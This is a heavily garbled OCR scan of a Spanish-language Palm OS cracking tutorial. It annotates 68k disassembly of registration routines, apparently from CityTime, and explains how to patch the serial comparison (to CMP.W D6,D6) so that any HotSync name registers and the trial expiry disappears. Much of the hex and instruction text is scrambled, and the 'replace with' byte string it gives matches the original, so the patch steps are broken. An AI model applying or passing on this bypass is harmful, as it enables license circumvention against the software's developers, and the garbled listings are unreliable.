0000380E 4E 4F 03 06 SysTrap 0306 

00003812 58 4F ADD.W +$4, A7 

00003814 2F 00 MOVE.L DO, -(A7) 

00003816 2F 3C 41 B8 00.. MOVE.L +$41B80000, -(A7) 
0000381C 74 2F MOVE.L +$2F, D2 

0000381E 4E 4F 03 06 SysTrap 0306 

00003822 50 4F ADD.W +$8, A7 

00003824 2F 00 MOVE.L DO, -(A7) 

00003826 74 31 MOVE.L $31, D2 

00003828 4E 4F 03 06 SysTrap 0306 

0000382C 50 4F ADD.W +$8, A7 

0000382E 2F 00 MOVE.L DO, -(A7) 

00003830 2F 3C 43 E3 00.. MOVE.L +$43E30000, -(A7) 
00003836 74 2E MOVE.L +$2E, D2 

00003838 4E 4F 03 06 SysTrap 0306 

0000383C 50 4F ADD.W +$8, A7 

0000383E 2F 00 MOVE.L DO, -(A7) 

00003840 74 2E MOVE.L +$2E, D2 

00003842 4E 4F 03 06 SysTrap 0306 

00003846 50 4F ADD.W +$8, A7 

00003848 2F 00 MOVE.L DO, -(A7) 

0000384A 74 12 MOVE.L +$12, D2 

0000384C 4E 4F 03 06 SysTrap 0306 

00003850 36 00 MOVE.W DO, D3 

00003852 52 44 ADD.W +$1, D4 

00003854 58 4F ADD.W +$4, A7 

loc_3856: 

00003858 6D 94 BLT.S LOC_37EE 

0000385A 30 43 MOVE.W D3, AO 

0000385C€ 20 3C 00 00 DE.. MOVE.L +$0000DEA8, DO 
00003862 90 88 SUB.L AO, DO 

00003864 36 00 MOVE.W DO, D3 

00003868 66 0C BNE.S $3876 

0000386A 70 01 MOVE.L +$1, DO 

0000386C 4F EF 00 28 LEA.L $28(A7), A7 
00003870 4C DF 

00003872 00 78 4E 75 70.. OR.W +$4E75, $7000 
00003878 4F EF 00 28 LEA.L $28(A7), A7 
0000387C 4C DF 

0000387E 00 78 4E 75 2D.. OR.W +$4E75, $2D00 
loc_3884: 

00003884 2F 0A MOVE.L A2, -(A7) 

00003886 4F EF FF D8 LEA.L -$28(A7), A7 
0000388A 4E 4F Al 73 SysTrap FrmGetActiveForm 
0000388E 24 48 MOVE.L AO, A2 

00003890 2F 0A MOVE.L A2, -(A7) 

00003892 4E 4F Al 71 SysTrap FrmDrawForm 
00003896 42 A7 CLR.L -(A7) 


00003898 
0000389A 
0000389E 
000038A0 
000038A2 
000038A4 
000038A8 
000038AC 
000038B0 
000038B4 
000038B8 
000038BA 


X-ref to 


000038BE 
000038C2 
000038C6 
000038CA 
000038cc 
000038CE 
000038D0 
000038D4 
000038D6 
000038DA 
000038DE 


loc_38E0: 


000038E0 
000038E6 
000038EA 
000038EE 
000038F0 
000038F2 
000038F6 
000038FA 
000038FE 
00003902 
00003906 
0000390A 
0000390€ 
00003912 
00003914 
00003918 
0000391C 
0000391E 
00003920 
00003924 
00003926 
00003928 
0000392A 
0000392E 
00003932 
00003934 
00003936 
0000393A 


loc_393E: 


0000393E 
00003940 


42 
48 
42 
42 
42 
4E 
48 
4E 
0C 
4F 
64 
3F 


A7 
6F 
A7 
A7 
A7 
4F 
6F 
4F 
40 
EF 
26 
3C 


Alert 


4E 
48 
4ÉE 
4A 
SC 
66 
41 
48 
48 
4E 
50 


2F 
48 
4E 
58 
3F 
48 
4E 
48 
4E 
e 
4F 
63 
2F 
42 
48 
4E 
SC 
2F 
4E 
58 
3F 
42 
48 
4E 
SC 
2F 
4E 
4F 


70 
2B 


4F 
6F 
4F 
40 
4F 
10 
FA 
50 
6F 
4F 
4F 


3C 
6F 
4F 
4F 
00 
6F 
4F 
6F 
4F 
40 
EF 
32 
3C 
27 
6F 
BA 
4F 
08 
4F 
4F 
00 
27 
6F 
BA 
4F 
08 
4F 
EF 


EF 
40 


CLR.L 
00 0c 
CLR.L 
CLR.L 
CLR.L 
A2 A9 
00 1C 
A0 C7 
00 02 
00 20 
BCC.S 
05 DC 


-(A7) 

PEA.L $C(A7) 
-(A7) 

-(A7) 

-(A7) 
SysTrap Dl1kGetSyncInfo 
PEA.L $1C(A7) 
SysTrap StrLen 
CMP.W +4$0002, 
LEA.L $20(A7), 
LOC_38E0 
MOVE.W *+$05DC, 


DO 
A7 


- (A7) 
(HotSync Name) 


Al 92 
00 02 
A0 C7 
TST.W 
ADD.W 
BNE.S 
00 7A 
PEA.L 
00 04 
A0 C5 
ADD .W 


SysTrap FrmAlert 
PEA.L $2(A47) 
SysTrap StrLen 
DO 

S6, A7 
LOC_38E0 

LEA.L S7A(PC), 
(A0) 

PEA.L $4(A7) 
SysTrap StrCopy 
$8, A7 


AO 


00 08 
00 04 


00.. MOVE.L +$00080020, 
PEA.L $4(A7) 

AO C7 SysTrap StrlLen 

ADD.W 4$4, A7 

MOVE.W DO, -(A7) 

00 06 PEA.L $6(A7) 

A2 20 SysTrap WinDrawChars 

00 0A PEA.L $A(A7) 
AO C7 SysTrap StrlLen 
00 01 CMP.W *+$0001, 
00 OE LEA.L SE(A7), 
BLS.S LOC_393E 

00 08 00.. MOVE.L +$00080052, 
CLR.B -(A7) 

00 06 PEA.L $6(A7) 

FD 7E JSR.L LOC_3698 

ADD.W +56, A7 

MOVE.L A0, -(A7) 

AO C7 SysTrap Strlen 

ADD.W +4$4, A7 

MOVE.W DO, -(A7) 

CLR.B -(A7) 

00 08 PEA.L $8(A7) 


DO 
A7 


FD 68 JSR.L LOC_3698 
ADD.W +56, A7 
MOVE.L AO, -(A7) 


A2 20 SysTrap WinDrawChars 


00 OA LEA.L SA(A7), A7 
MOVE.L $$FEF, DO 
FF B8 MOVE.L DO, VAR_48 


-(A7) 


-(A7) 


00003944 4F EF 00 28 LEA.L $28(A7), A7 
00003948 24 5F MOVE.L (A7)+, A2 

0000394A 4E 75 RIS 

0000394C 2D 00 MOVE.L DO, -(A6) 

0000394E 48 E7 

00003950 18 30 24 6F MOVE.B S$6F (AO, D2.W), D4 
00003954 00 14 OR.B +$$14, (Al) 

00003956 76 00 MOVE.L +$0, D3 

00003958 30 12 MOVE.W (A2), DO 

0000395A 04 40 00 09 SUB.W +$0009, DO 
0000395E 67 0C BEQ.S LOC_396C 

00003960 04 40 00 OF SUB.W +$000F, DO 
00003964 67 00 00 AA BEQ LOC_3A10 

00003968 60 00 00 AC BRA LOC_3A16 
loc_396C: 

0000396C 0C 6A 05 E4 00.. CMP.W +f$05E4, $8(A2) 
00003972 66 78 BNE.S LOC_39EC 

00003974 3F 3C 05 E2 MOVE.W *$05E2, -(A7) 
00003978 4E BA F1 94 JSR.L LOC_2BOE 
0000397C 26 48 MOVE.L AO, A3 

0000397E 2F 0B MOVE.L A3, -(A7) 

00003980 4E 4F Al 39 SysTrap FldGetTextPtr 
00003984 20 08 MOVE.L AO, DO 

00003986 5C 4F ADD.W +$6, A7 

00003988 67 14 BEQ.S LOC_399E 

0000398A 2F 0B MOVE.L A3, -(A7) 

0000398C 4E 4F Al 39 SysTrap FldGetTextPtr 
00003990 58 4F ADD.W +$4, A7 

00003992 2F 08 MOVE.L AO, -(A7) 

00003994 4E 4F AO CE SysTrap StrATol 
00003998 38 00 MOVE.W DO, D4 

00003994 58 4F ADD.W +$4, A7 

0000399C 60 02 BRA.S LOC_39A0 

loc_399E: 

0000399E 78 01 MOVE.L +$1, D4 

loc_39A0: 

000039A0 3F 04 MOVE.W D4, -(A7) 

00003942 4E BA FE 02 JSR.L LOC_37A6 <-—-—- Salta a posible rutina check registraron 


curiosamente salta antes de que se pida el 
nombre de nuestro HotSync/Name 


00003946 4A 00 TST.B DO 

00003948 54 4F ADD.W *$2, A7 

000039AA 67 36 BEQ.S LOC_39E2 

000039AC 70 00 MOVE.L +$0, DO 

000039AE 30 04 MOVE.W D4, DO 

000039B0 2B 40 FF 2C MOVE.L DO, VAR_D4 

000039B4 3F 3C 05 14 MOVE.W EOS 1 4 -(A7) <-——- Registro valido 


[CityTime| Anchorage 12:42 arn 


Register 


User Name: 
Compaq 
UserCode: 


Registered 


A thousand 


thankyou's for 
registering CityTime! 


X-ref to Alert 


000039B8 
000039BC 
000039C0 
000039C4 
000039C8 
000039cc 
000039CE 
000039D0 
000039D4 
000039D6 
000039DA 
000039DE 
000039E0 


loc_39E2: 


000039E2 


[CityTime| Sydney 12:39 am 


4E 
3F 
4É 
4ÉE 
4E 
1F 
00 
4ÉE 
42 
4E 
4E 
50 
60 


3F 


4F 
3C 
4F 
BA 
BA 
3C 
01 
BA 
2d 
BA 
BA 
4F 
OA 


3C 


Register 


User Name: 
Compaq 
UserCode: 


(Registered) 


Al 92 
03 E8 
Al 9E 
cr 82 
D4 BA 


SysTrap FrmAlert 

MOVE.W +$03E8, -(A7) 
SysTrap FrmReturnToForm 
JSR.L LOC_948 

JSR.L LOC_E84 


MOVE.B +$3C, -(A7) 
OR.B +$1, D1 


D5 3E 
CLR.B 
D1 06 
D2 E6 
ADD.W 
BRA.S 


05 78 


Not Registered 


D Registration code not 
valid. 
Please try again. 


X-ref to Alert 


000039E6 
000039EA 


loc_39EC: 


000039EC 
000039F2 
000039F4 
000039F8 
000039FC 
00003A00 
00003A02 
00003A06 
00003A0A 


loc_3A0C: 


00003A0C 
00003A0E 


loc_3A10: 


4E 
54 


e 
66 
3F 
4E 
4E 
42 
4E 
4ÉE 
58 


76 
60 


4F 
4F 


6A 
18 
3C 
4F 
BA 
27 
BA 
BA 
4F 


01 
06 


JSR.L LOC_F10 
-(A7) 

JSR.L LOC_ADE 
JSR.L LOC_CC2 
$S8, A7 
LOC_39EC 


MOVE .W O S'78) -(A7) <-—-—- Ventana de registro invalido 


(Not Registered) 


Al 92 
ADD.W 


05 E3 
BNE.S 
03 E8 
Al 9E 
Cr 4A 
CLR.B 
DO DA 
D2 BA 
ADD.W 


SysTrap FrmAlert 
$S2, A7 


00.. CMP.W F*$05E3, $8(A2) 
LOC_3A0C 

MOVE.W +$03E8, -(A7) 
SysTrap FrmReturnToForm 
JSR.L LOC_948 

-(A7) 

JSR.L LOC_ADE 

JSR.L LOC_CC2 

$$4, A7 


MOVE.L $$1, D3 


BRA.S 


LOC_3A16 


00003A10 4E BA FE 72 JSR.L LOC_3884 
00003A14 76 01 MOVE.L +$1, D3 

loc_3A16: 

00003A16 10 03 MOVE.B D3, DO 

00003A18 4C DF 

00003A1A 0C 18 CMP.B +$18, (A0)+ 
00003A1C 4E 75 RTS 

loc_3A1E: 

00003A1E 48 E7 

00003A20 18 30 26 6F MOVE.B $6F(AO0, D2.W), D4 
00003A24 00 14 OR.B +$14, (A4) 

00003A26 78 00 MOVE.L +$0, D4 

00003A28 0C 53 00 17 CMP.W *+$0017, (A3) 
00003A2C 66 00 00 92 BNE LOC_3AC0 
00003A30 36 2B 00 08 MOVE.W $8(A3), D3 
00003A34 3F 03 MOVE.W D3, -(A7) 
00003A36 4E 4F Al 6F SysTrap FrmInitForm 
00003A3A 24 48 MOVE.L AO, A2 

00003A3C 2F 0A MOVE.L A2, -(A7) 
00003A3E 4E 4F Al 74 SysTrap FrmSetActiveForm 
00003A42 5C 4F ADD.W +$6, A7 

00003A44 30 03 MOVE.W D3, DO 

00003A46 04 40 03 E8 SUB.W +$03E8, DO 
00003A4A 67 20 BEQ.S LOC_3A6C 

00003A4C 04 40 00 64 SUB.W +$0064, DO 
00003A50 67 28 BEQ.S LOC_3A7A 

00003A52 04 40 00 C8 SUB.W +$00C8, DO 
00003A56 67 4C BEQ.S LOC_3AA4 

00003A58 04 40 00 64 SUB.W +$0064, DO 
00003A5C 67 38 BEQ.S LOC_3A96 

00003A5E 04 40 00 64 SUB.W +$0064, DO 
00003A62 67 4E BEQ.S LOC_3AB2 

00003A64 04 40 00 64 SUB.W +$0064, DO 
00003A68 67 1E BEQ.S LOC_3A88 

00003A6A 60 52 BRA.S LOC_3ABE 


En la Offset de la linea: 


h =-—- Cambiar por CMP.W D6, D6 en hexa es (BC 46 

Vemos como se compara el serial falso con el verdadero, si paramos en el debugger en 
esta instrucción , aquí veremos el serial introducido y el falso serial en alguna 
parte de los registros (DO ..... DT) Ó (AD emmm A7 ), Usando el comando "Dm" por 
supuesto si es que se usa el PalmDebugger. 


Buscamos la cadena 

DE A8 90 88 36 00 66 0C 70 01 4F EF 00 28 

Y la cambiamos por: 

DE A8 90 88 36 00 66 0C 70 01 4F EF 00 28 

Guardamos el archivo y con esto hacemos que el serial bueno se compare así mismo 
sin considerar lo que introduzcamos, con esto logramos que esta aplicación sea valida 
en cualquier Palm con cualquier Hotsync/Name, Adelantamos el reloj 5 años y el 
programa trabaja a la perfección, Además desmontamos la rutina de comparación del 
serial, haciendo que se compare así mismo, Al ir al menu en la opción de "Get Info" 
aparece un mensaje de registrado y hasta las gracias nos dan, Se ha borrado la 
notificación de que nos faltan 10 días para que expire el programa. 
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INTRODUCCION 


Primero analizaremos esta tabla de instrucciones. 


CMP.W DO, DO BO 40 


CMP.W  DI1,Dl1 B2 41 
CMP.W  D2, D2 B4 42 
CMP.W  D3,D3 B6 43 


AL ATAQUE 


Desensamblando con PalmDemon v0.27 Obtenemos. 


000084AC 52 46 ADD.W +$1, D6 
loc_84AE: 

000084AE 0C 45 00 OA CMP.W *F$000A, D5 
000084B2 6C 04 BGE.S LOC_84B8 
000084B4 30 05 MOVE.W D5, DO 

000084B6 60 02 BRA.S LOC_84BA 


loc_84B8: 

000084B8 70 OA MOVE.L SA, DO 

loc_84BA: 

TEARS <——— Aquí se compara el registro valido con el falso 


antes de abrir el primer formulario de inicio, y 
aquí también se decide si se mostraran todas las 
limitaciones del programa para usuarios no regis- 
trados, esto lo podemos ratrear con el famoso 
PalmDebugger 


000084BC 
000084BE 
000084C0 
000084C2 
000084C4 
000084C8 
000084CA 
000084CccC 
000084D0 
000084D6 
000084D8 
000084DA 
000084DC 
000084E0 
000084E2 
000084E4 
000084E6 
000084EC 
000084EE 
000084F2 
000084F6 
000084FA 
000084FE 
00008502 
00008504 
00008508 


loc_850A: 


0000850A 


loc_850E: 


0000850E 
00008510 
00008512 
00008514 
00008516 
0000851A 
0000851C 
0000851E 


86 
00 
07 
48 
ED 
04 
44 
ED 
BO 
00 
07 
¡elo 
FC 
40 
04 
44 
BO 
49 
30 
ED 
2E 
30 
2E 
06 
ED 
04 


ED 


DF 
F8 
SE 
75 
12 
6F 
65 
00 


Entonces si hacemos que se compare el registro: 
Cambiando el anterior y poner CMP.W D6,D6 
Quedaria "000084BA BC 46 CMP.W D6, D6" 

BLT.S LOC_8444 

MOVE.L +$$0, DO 

MOVE.B D7, DO 

LSR.W +54, DO 

FF C4 LEA.L VAR_3C, AO 

MOVE.W D4, D1 

ADD.W +$S1, D4 

FF 80 LEA.L VAR_80, Al 

00 00 10.. MOVE.B $0(A0, 

MOVE.L +$0, DO 

MOVE.B D7, DO 


DO.W), $0(Al, D1.W) 


00 10 DIVS.W +$0010, 
PEA.L DO 
MOVE .W D4, 
ADD.W +4$S1, 
00 00 10.. MOVE.B $0(A0, 
MOVE.L Al, AO 

40 00 CLR.B $0(A0, D4.W) 
FF 74 LEA.L VAR_8C, AO 
FF FE MOVE.W SVAR_02, DO 
00 00 CLR.B $0(AO0, DO.W) 
00 0C TST.B SC(A6) 

BEQO.S LOC_850A 

FF 74 LEA.L VAR_8C, AO 
BRA.S LOC_850E 


DO 


D1 
D4 
DO.W), 


SO(Al, D1.W) 


Fr 80 LEA.L VAR_80, AO 


DC.W +04F8 
UNLK.L A6 

RTS 

65 67 or.w d3, 
DC.W $436F 
bcc.s $8583 
or.b +$0, d0 


S67(a2, d6.w) 


FUNCTION RegValid (struct) 


; local struct 


RegValid: 


00008520 
00008524 
00008526 
0000852A 
0000852C 
0000852E 


loc_8530: 


00008530 
00008534 
00008538 
0000853C 
00008540 


4E 
2F 
4A 
67 
70 
60 


48 
48 
48 
48 
48 


56 
OA 
2D 
04 
01 
5A 


78 
78 
6É 
78 
78 


sVar_2A = -$2A(a6) 


FF D6 LINK.L A6, 
MOVE.L A2, -(A7) 
FF 73 TST.B VAR_8D 
BEQO.S LOC_8530 
MOVE.L *$$1, DO 


+-52A 


BRA.S LOC_858A 
00 00 PEA.L $0 
00 00 PEA.L $0 
FF D6 PEA.L SVAR_2A 
00 00 PEA.L $0 
00 00 PEA.L $0 


00008544 
00008548 
0000854C 
00008550 
00008554 
00008556 
0000855A 
0000855€ 
00008560 
00008564 


loc_8566: 


00008566 
00008568 
0000856A 
0000856E 
00008572 
00008574 
00008576 
0000857A 
0000857E 
00008582 
00008586 


loc_858A: 


0000858A 
0000858€ 
0000858E 
00008590 
00008592 
00008594 
00008596 
00008598 
0000859C 
0000859E 


r 


r 


78 
4F 
2E 
EF 
10 
FA 
50 
6ÉE 
4F 
4F 


3C 
01 
6ÉE 
BA 
48 
OA 
2E 
BA 
40 
2D 
EF 


SE 
5E 
75 
52 
67 
61 
69 
00 
52 
32 


00 00 
A2 A9 
FF D6 
00 18 
BNE.S 
00 44 
PEA.L 
FF D6 
A0 C5 
ADD.W 


PEA.L $0 


TST.B SVAR_2A 
LEA.L $18(A7), A7 
LOC_8566 

LEA.L $44(PC), AO 
(A0) 

PEA.L SVAR_2A 
SysTrap StrCopy 
$8, A7 


MOVE.B +$$3C, 
OR.B +$1, D1 
FF D6 PEA.L SVAR_2A 


-(A7) 


FE BO JSR.L REGCODE 
MOVE.L A0, A2 

MOVE.L A2, -(A7) 

00 08 MOVE.W $8(A6), -(A7) 
FE 00 JSR.L LOC_837C 

FF 73 MOVE.B DO, VAR_8D 
FF 73 MOVE.B VAR_8D, DO 
00 0C LEA.L $C(A7), A7 
MOVE.L (A7)+, A2 

UNLK.L A6 

RTS 

or.w (a2), d4 

bcs.s $85FB 

add.w $3, -(al) 

bge.s $8601 

00 06 bcca $85A0 

add.w +52, (a2) 

35 00 not.b $0(a2, d3.w) 


FUNCTION RegFormInit () 


¿ local struct 
; local struct 


RegFormInit: 


000085A2 
000085A6 
000085A8 
000085AC 
000085AE 
000085B2 
000085B6 
000085BA 
000085BE 
000085C2 
000085C6 
000085CA 
000085CE 
000085D2 
000085D4 
000085D8 
000085DA 


4E 
48 
00 
00 
48 
48 
48 
48 
48 
48 
4ÉE 
4A 
4F 
66 
41 
48 
48 


56 
E7 
38 
08 
78 
78 
6ÉE 
78 
78 
78 
4F 
2E 
EF 
10 
FA 
50 
6ÉE 


sVar_2A 
sVar_5E 


-$2A (a6) 
—$5E (a6) 


FF 6E LINK.L A6, +*+S6E 
24 6E OR.B +$38, 
OR.B +$$8, AO 

00 00 PEA. 
00 00 PEA. 
FF D6 PEA. 
00 00 PEA.L $0 
00 00 PEA.L $0 
00 00 PEA.L $0 
A2 A9 
FF D6 
00 18 
BNE.S 
01 26 
PEA.L 
FF D6 


5246E 


$0 
$0 
SVAR_2A 


A A e A 


TST.B SVAR_2A 
LEA.L $18(A7), A7 
LOC_85E4 

LEA.L $126(PC), AO 
(A0) 

PEA.L SVAR_2A 


SysTrap DlkGetSyncInfo 


SysTrap DlkGetSyncInfo 


<--- Lee nuestro Hotsync Name 


<--- Lee nuestro Hotsync Name 


000085DE 4E 4F AO C5 SysTrap StrCopy 

000085E2 50 4F ADD.W +$8, A7 

loc_85E4: 

000085E4 3F 3C 05 7B MOVE.W +$057B, -(A7) 
000085E8 2F 0A MOVE.L A2, -(A7) 

000085EA 4E 4F Al 80 SysTrap FrmGetObjectIndex 
000085EE 5C 4F ADD.W +$6, A7 

000085F0 3F 00 MOVE.W DO, -(A7) 

000085F2 2F OA MOVE.L A2, -(A7) 

000085F4 4E 4F Al 83 SysTrap FrmGetObjectPtr 
000085F8 26 48 MOVE.L AO, A3 

000085FA 48 6ÉE FF D6 PEA.L SVAR_2A 

000085FE 48 6E FF 6E PEA.L -$92(A6) 

00008602 4E 4F AO C5 SysTrap StrCopy 

00008606 48 6E FF 6E PEA.L -$92(A6) 

00008604 2F 0B MOVE.L A3, -(A7) 

0000860C 4E BA FC 4C JSR.L SETFIELDTEXT 
00008610 42 27 CLR.B -(A7) 
00008612 48 6ÉE FF D6 PEA.L SVAR_2A 

00008616 4E BA FE 08 JSR.L REGCODE 

0000861A 28 48 MOVE.L AO, A4 

0000861C 3F 3C 05 7C MOVE.W +$057C, -(A7) 
00008620 2F 0A MOVE.L A2, -(A7) 

00008622 4E 4F Al 80 SysTrap FrmGetObjectIndex 
00008626 5C 4F ADD.W +$6, A7 

00008628 3F 00 MOVE.W DO, -(A7) 

0000862A 2F 0A MOVE.L A2, -(A7) 

0000862C 4E 4F Al 83 SysTrap FrmGetObjectPtr 
00008630 26 48 MOVE.L AO, A3 

00008632 2F 0C MOVE.L A4, -(A7) 

00008634 48 6E FF A2 PEA.L SVAR_5E 

00008638 4E 4F AO C5 SysTrap StrCopy 

0000863C 48 6E FF A2 PEA.L SVAR_5E 

00008640 2F 0B MOVE.L A3, -(A7) 

00008642 4E BA FC 16 JSR.L SETFIELDTEXT 
00008646 4A 2D FF 73 TST.B VAR_8D 

0000864A 4F EF 00 32 LEA.L $32(A7), A7 
0000864E 67 42 BEQ.S LOC_8692 

00008650 3F 3C 05 7F MOVE.W +$057F, —(A7) 
00008654 2F 0A MOVE.L A2, -(A7) 

00008656 4E 4F Al 80 SysTrap FrmGetObjectIndex 
0000865A 5C 4F ADD.W +$6, A7 

0000865C€ 3F 00 MOVE.W DO, -(A7) 

0000865E 2F 0A MOVE.L A2, -(A7) 

00008660 4E 4F Al 84 SysTrap FrmHide0bject 
00008664 3F 3C 05 7D MOVE.W +$057D, -(A7) 
00008668 2F 0A MOVE.L A2, -(A7) 

0000866A 4E 4F Al 80 SysTrap FrmGetObjectIndex 
0000866E 5C 4F ADD.W +$6, A7 

00008670 3F 00 MOVE.W DO, -(A7) 

00008672 2F 0A MOVE.L A2, -(A7) 

00008674 4E 4F Al 84 SysTrap FrmHide0bject 
00008678 3F 3C 05 7E MOVE.W +*$S057E, -(A7) 
0000867C 2F OA MOVE.L A2, -(A7) 

0000867E 4E 4F Al 80 SysTrap FrmGetObjectIndex 
00008682 5C 4F ADD.W +$6, A7 

00008684 3F 00 MOVE.W DO, -(A7) 


00008686 
00008688 
0000868€ 
00008690 


loc_8692: 


00008692 
00008696 
00008698 
0000869€ 
0000869 
000086A0 
000086A2 
000086A6 
000086AA 
000086AC 
000086B0 
000086B2 
000086B4 
000086B6 
000086BA 
000086BE 
000086C0 
000086C4 
000086C6 
000086C8 
000086CA 
000086CE 
000086D2 
000086D4 
000086D8 
000086DA 
000086DC 
000086DEÉ 
000086E2 


loc_86E6: 


000086E6 
000086E8 
000086EA 
000086EC 
000086EE 
000086F0 
000086F2 
000086F6 
000086F8 
000086FA 
000086FC 
000086FE 


; local struct sVar_2A = 
;+ local word wVar_2C = 
¿ local word wVar_2E = 


OA 
4F 
EF 
54 


3C 
OA 
4F 
4F 
00 
OA 
4F 
3C 
OA 
4F 
4F 
00 
OA 
4F 
3C 
OA 
4F 
4F 
00 
OA 
4F 
3C 
OA 
4F 
4F 
00 
OA 
4F 
EF 


DF 
00 
SE 
75 
52 
67 
6F 
6ÉE 
74 
06 
52 
32 


MOVE.L A2, -(A7) 

Al 85 SysTrap FrmShow0bject 
00 12 LEA.L $12(A7), A7 
BRA.S LOC_86E6 


05 7F MOVE.W +$057F, 
MOVE.L A2, -(A7) 


-(A7) 


Al 80 SysTrap FrmGetObjectInd 
ADD.W +$6, A7 

MOVE.W DO, -(A7) 

MOVE.L A2, -(A7) 

Al 85 SysTrap FrmShow0bject 
05 7D MOVE.W +$057D, -(A7) 
MOVE.L A2, -(A7) 

Al 80 SysTrap FrmGetObjectInd 


ADD.W +$6, A7 

MOVE.W DO, -(A7) 

MOVE.L A2, -(A7) 

Al 85 SysTrap FrmShow0bject 
05 TE MOVE.W +*$057E, -(A7) 
MOVE.L A2, -(A7) 


Al 80 SysTrap FrmGetObjectInd 
ADD.W +$6, A7 

MOVE.W DO, -(A7) 

MOVE.L A2, -(A7) 

Al 84 SysTrap FrmHide0bject 
05 7F MOVE.W +$057EF, -(A7) 
MOVE.L A2, -(A7) 

Al 80 SysTrap FrmGetObjectInd 


ADD.W $6, A7 

MOVE.W DO, -(A7) 

MOVE.L A2, -(A7) 

Al 79 SysTrap FrmSetFocus 
00 18 LEA.L $18(A7), A7 


MOVE.B DO, 
UNLK.L A6 
RTS 

or.w d5, (a2) 

bcs.s $8759 

72 6D not.w $726D(a7) 
DC.W 4496E 

bvs.s $876E 

or.b +56, d6 
add.w +52, (a2) 

35 00 not.b $0(a2, 


D6 


d3.w) 


FUNCTION RegFormHandleEvent () 


-$2A (a6) 
-$2C (a6) 
-$2E (a6) 


RegFormHandleEvent : 


00008702 4E 56 FF D2 


00008706 48 E7 


00008708 18 30 24 6E 


LINK.L A6, +-$2E 


MOVE.B $6E(A0, D2.W), D4 


x 


0000870€ 
0000870E 
00008710 
00008712 
00008714 
00008718 
0000871A 
0000871E 
00008720 


loc_8724: 


00008724 
00008728 
0000872A 
0000872C 
00008730 
00008732 
00008736 
00008738 
0000873A 


loc_873E: 


0000873E 
00008744 
00008746 
00008748 
0000874C 


loc_874E: 


0000874E 
00008754 
00008758 
0000875€ 
0000875E 
00008760 
00008764 
00008766 
00008768 


loc_876C: 


0000876C 
00008770 
00008772 
00008776 
00008778 
0000877€ 
0000877E 
00008780 
00008782 
00008786 
00008788 
0000878A 
0000878E 
00008790 
00008792 
00008796 
00008798 
0000879C 
0000879E 
000087A0 
000087A4 


00 
76 
78 
30 
04 
67 
04 
67 
60 


4E 
24 
2F 
4E 
2F 
4E 
76 
50 
60 


e 
66 
42 
4ÉE 
54 


0C 
66 
4A 
67 
42 
4ÉE 
76 
54 
60 


4E 
24 
3F 
2F 
4E 
36 
3F 
2F 
4E 
26 
2F 
4E 
24 
2F 
4E 
4A 
4F 
67 
2F 
4E 
38 


OR.B $$8, AO 
MOVE.L $0, 
MOVE.L $0, D4 
MOVE.W (A2), DO 

00 09 SUB.W F$0009, 
BEQ.S LOC_873E 

00 OF SUB.W FS$000F, 
BEQ.S LOC_8724 

01 64 BRA LOC_8886 


D3 


DO 


DO 


Al 73 SysTrap FrmGetActiveForm 
MOVE.L A0, A2 

MOVE.L A2, -(A7) 

FE 74 JSR.L REGFORMINIT 

MOVE.L A2, -(A7) 

Al 71 SysTrap FrmDrawForm 
MOVE.L +$1, D3 

ADD.W +4$8, A7 

01 4A BRA LOC_8886 


05 81 
BNE.S 
CLR.W 
Al 9E 
ADD.W 


00.. CMP.W +$0581, 
LOC_874E 

-(A7) 

SysTrap FrmReturnToForm 
$$2, A7 


$58 (A2) 


05 80 
01 2E 
FE 773 
BEQ.S 
CLR.W 
Al 9E 


00.. CMP.W +$0580, 
BNE LOC_8884 
TST.B VAR_8D 
LOC_876C 

-(A7) 

SysTrap FrmReturnToForm 
MOVE.L +$$1, D3 

ADD.W +$2, A7 

01 1C BRA LOC_8886 


58 (A2) 


Al 73 SysTrap FrmGetActiveForm 
MOVE.L A0, A2 

05 7F MOVE.W +SO57F, 
MOVE.L A2, -(A7) 

Al 80 SysTrap FrmGetObjectIndex 
MOVE .W DO, D3 

MOVE.W D3, -(A7) 

MOVE.L A2, -(A7) 

Al 83 SysTrap FrmGetObjectPtr 
MOVE.L AO, A3 

MOVE.L A3, -(A7) 

Al 39 SysTrap FldGetTextPtr 
MOVE.L A0, A2 

MOVE.L A2, -(A7) 

FC 3A JSR.L VALIDKEY 
TST.B DO 

00 14 LEA.L $14(A7), 
BEQ.S LOC_87FA 
MOVE.L A2, -(A7) 

AO CE SysTrap StrATol 
MOVE.W DO, D4 


-(A7) 


A7 


000087A6 48 78 00 00 PEA.L $0 
000087AA 48 78 00 00 PEA.L $0 
000087AE 48 6E FF D6 PEA.L SVAR_2A 
000087B2 48 78 00 00 PEA.L $0 
000087B6 48 78 00 00 PEA.L $0 


000087BA 48 78 00 00 PEA.L $0 

000087BE 4E 4F A2 A9 SysTrap DlkGetSyncInfo <--- Lee nuestro Hotsync Name 
000087C2 4A 2E FF D6 TST.B SVAR_2A 

000087C6 4F EF 00 1C LEA.L $1C(A7), A7 

000087CA 66 10 BNE.S LOC_87DC 

000087CC 41 FA 00 D8 LEA.L $D8(PC), AO 

000087D0 48 50 PEA.L (AO) 

000087D2 48 6E FF D6 PEA.L SVAR_2A 

000087D6 4E 4F AO C5 SysTrap StrCopy 

000087DA 50 4F ADD.W +$8, A7 

loc_87DC: 

000087DC 1F 3C MOVE.B +$$3C, -(A7) 

000087DE 00 01 OR.B +$1, D1 

000087E0 48 6E FF D6 PEA.L SVAR_2A 

000087E4 4E BA FC 3A JSR.L REGCODE 

000087E8 24 48 MOVE.L AO, A2 

000087EA 2F OA MOVE.L A2, -(A7) 

000087EC 3F 04 MOVE.W D4, -(A7) 

000087EE 4E BA FB 8C JSR.L LOC_837C 

000087F2 1B 40 FF 73 MOVE.B DO, VAR_8D 

000087F6 4F EF 00 0C LEA.L $C(A7), A7 

loc_87FA: 

000087FA 4A 2D FF 73 TST.B VAR_8D 

000087FE 67 6A BEQ.S LOC_886A 

00008800 3D 7C 00 02 FF.. MOVE.W +$0002, WVAR_2E 
00008806 1F 3C MOVE.B +$3C, -(A7) 

00008808 00 01 OR.B +$1, D1 

0000880A 48 6EÉ FF D2 PEA.L WVAR_2E 

0000880E 48 6E FF D4 PEA.L WVAR_2C 

00008812 42 67 CLR.W -(A7) 

00008814 2F 3C 52 46 48.. MOVE.L +$52464832, -(A7) : -> 'RFH2' 
0000881A 4E 4F A2 D3 SysTrap PrefGetAppPreferences 
0000881E 52 40 ADD.W +$1, DO 

00008820 4F EF 00 10 LEA.L $10(A7), A7 

00008824 67 22 BEQ.S LOC_8848 

00008826 3D 44 FF D4 MOVE.W D4, WVAR_2C 

0000882A 1F 3C MOVE.B +$3C, -(A7) 

0000882C 00 01 OR.B +$1, D1 

